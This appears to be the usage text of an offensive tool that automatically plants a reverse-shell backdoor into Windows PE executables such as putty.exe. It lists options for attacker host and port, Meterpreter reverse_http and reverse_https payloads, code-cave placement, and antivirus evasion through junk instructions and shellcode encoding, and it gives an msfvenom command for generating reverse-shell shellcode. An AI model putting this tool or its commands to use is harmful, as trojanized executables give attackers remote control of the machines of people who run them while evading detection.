My implementation of automatically adding a backdoor shell to a PE file.
Usage: usage python [OPTIONS]
Example: python -f ./putty.exe -H -P 443 -p 3
-h, --help show this help message and exit
-f FILE Specify input PE file to backdoor
-o OUTPUT Specify output location to save backdoored file.
-H HOSTIP Specify IP Address of listening Host for reverse connection, ex:
-P PORT Specify listening port number, ex: 4321
-s SHELLCODE Specify custom shellcode to use, NOTE: this feature in backdoor mode adds 310 bytes to shellcode size
NOTE: must be in "feedbeef" hex format, recommend using the following command to properly format shellcode:
msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 -f raw | xxd -p | tr -d " "
-p PAYLOAD Specify payload. Default shell_reverse_tcp. Valid values are:
0 - windows/shell_reverse_tcp
1 - windows/meterpreter/reverse_http
2 - windows/meterpreter/reverse_http +PrependMigrate
3 - windows/meterpreter/reverse_https
4 - windows/meterpreter/reverse_https +PrependMigrate
-m MODE Specify program mode. Program was designed to backdoor executables, but if you really need to, you can disable normal program execution with the FRONTDOOR mode.
Valid values are (Default 0):
-t TARGETOS Specify the target Operating System (used for preserving ESP). Default Win7_64bit. Valid values are:
0 - Win7_32bit
1 - Win7_64bit
2 - Win8.1_64bit
3 - Win10_64bit
-d OFFSET Specify the offset distance between shellcode and start of cave. Recommend increasing this value if PE is crashing after shell.
Default: 4
-j NUM_JUNK Specify the number of "Junk" Instructions to use in heuristic bypass routine.
Default 30
-J NUM_JUNK_ITER Specify the number of times to iterate over all "Junk" Instructions used in heuristic bypass routine.
Default 20,000,000
-e NUM_ENCODE Specify number of random operations used to encode the shellcode.
Default: 10, Max: 40